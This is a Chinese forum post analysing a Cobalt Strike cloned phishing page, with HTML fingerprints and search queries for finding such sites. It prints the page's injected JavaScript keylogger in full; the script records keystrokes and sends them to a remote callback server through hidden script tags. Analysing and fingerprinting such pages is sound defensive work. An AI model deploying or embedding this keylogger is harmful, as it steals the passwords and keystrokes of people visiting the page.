跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

(CS)钓鱼克隆网站分析 详细教程包含代码


KaiWn

推荐的帖子

克隆后的html和原html对比

2RilTS.png

特征:

  1. IFRAME标签为大写,且长宽为0。
  2. script标签加载了js路径为”/jquery/jquery.min.js”

顺序特征:

  1. IFRAME标签和script标签同时出现时,一定是IFRAME标签、script标签和body标签这个顺序。
  2. IFRAME标签和script标签只出现一个时,一定在body标签之前。

引用的js分析:

var cfqPdaQzXzSSf = 0;
window.onload = function loadfqPdaQzXzSSf() { //页面加载处理事件
    lfqPdaQzXzSSf = ",";
    if (window.addEventListener)  { //对象触发指定的事件
        document.addEventListener('keypress', pfqPdaQzXzSSf, true); //keypress所有键都会触发该事件,无论它们是否产生字符值 处理函数:pfqPdaQzXzSSf
        document.addEventListener('keydown', dfqPdaQzXzSSf, true); //keydown当按下某个键时会触发该事件 处理函数:dfqPdaQzXzSSf
    } else if (window.attachEvent)  { //attachEvent在IE9以下的版本中受到支持。其它的都支持addEventListener
        document.attachEvent('onkeypress', pfqPdaQzXzSSf);
        document.attachEvent('onkeydown', dfqPdaQzXzSSf);
    } else { //两者都不支持全部置空
        document.onkeypress = pfqPdaQzXzSSf;
        document.onkeydown = dfqPdaQzXzSSf;
    }


}


function pfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event)?window.event.keyCode:e.which; //只有当DOM事件处理程序被调用的时
    kfqPdaQzXzSSf = kfqPdaQzXzSSf.toString(16); //将键盘码转换为ascii
    if (kfqPdaQzXzSSf != "d")  { //随便写个判断进入函数
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }


}


function dfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event)?window.event.keyCode:e.which;
    if (kfqPdaQzXzSSf == 9||kfqPdaQzXzSSf == 8||kfqPdaQzXzSSf == 13)  { //tab键,退格键,回车键
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }


}


function fqPdaQzXzSSf(kfqPdaQzXzSSf) {
    lfqPdaQzXzSSf = lfqPdaQzXzSSf + kfqPdaQzXzSSf + ","; //键盘值拼接
    var tfqPdaQzXzSSf = "ZUyQXfawhPbi" + cfqPdaQzXzSSf;
    cfqPdaQzXzSSf++;
    var ffqPdaQzXzSSf;
    if (document.all&&(navigator.appVersion.match(/MSIE ([\d.]+)/)[1]) <= 8.0)  { //浏览器版本判断是否小于或等于8.0
        ffqPdaQzXzSSf = document.createElement(String.fromCharCode(60) + "script name='"+tfqPdaQzXzSSf+"' id='"+tfqPdaQzXzSSf+"'" + String.fromCharCode(62) + String.fromCharCode(60) + "/script" + String.fromCharCode(62));
    } else {
        ffqPdaQzXzSSf = document.createElement("script");
        ffqPdaQzXzSSf.setAttribute("id", tfqPdaQzXzSSf);
        ffqPdaQzXzSSf.setAttribute("name", tfqPdaQzXzSSf);
    }


    var ejDBFWFHhff = '?id=' + window.location.href.split(/\?id=/)[1]; //取键盘ascii码
    ffqPdaQzXzSSf.setAttribute("src", "http://10.23.66.18:8080/callback" + ejDBFWFHhff + "&data=" + lfqPdaQzXzSSf);
    ffqPdaQzXzSSf.style.visibility = "hidden";
    document.body.appendChild(ffqPdaQzXzSSf); //实例化js,发送键盘码
    if (kfqPdaQzXzSSf == 13||lfqPdaQzXzSSf.length > 3000)  { //判断键盘码为回车键置空lfqPdaQzXzSSf变量
        lfqPdaQzXzSSf = ",";
    }


    setTimeout('document.body.removeChild(document.getElementById("' + tfqPdaQzXzSSf + '"))', 5000); //延时5秒删除创建的js
}

页面加载处理事件,添加针对键盘按下的事件。触发事件的时候进入dfqPdaQzXzSSf和dfqPdaQzXzSSf函数处理,最后调用fqPdaQzXzSSf函数,将键盘码通过创建script标签将数据传送到远端。最后延迟5秒后删除创建的js

pfqPdaQzXzSSf函数:
键盘码转ascii码发送到fqPdaQzXzSSf函数

dfqPdaQzXzSSf函数:
如果按下tab键,退格键,回车键调用fqPdaQzXzSSf函数发送键盘

chrome动态调试

键盘码判断
键盘码判断
键盘码拼接
键盘码拼接
js创建发送键盘码到远端
js创建发送键盘码到远端

cs远端接收的密码

2RiqXt.png

360空间绘测特征搜索:

response:"<head> <base href=" AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">" AND response:"jquery/jquery.min.js\"></script> </body>"

response:"<head> <base href=" AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">" AND response:"WIDTH=\"0\" HEIGHT=\"0\"></IFRAME>"
2RF9pj.png

参考链接

https://mp.weixin.qq.com/s/1lZlqxTuEcS3VK1Ve8XDbA

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...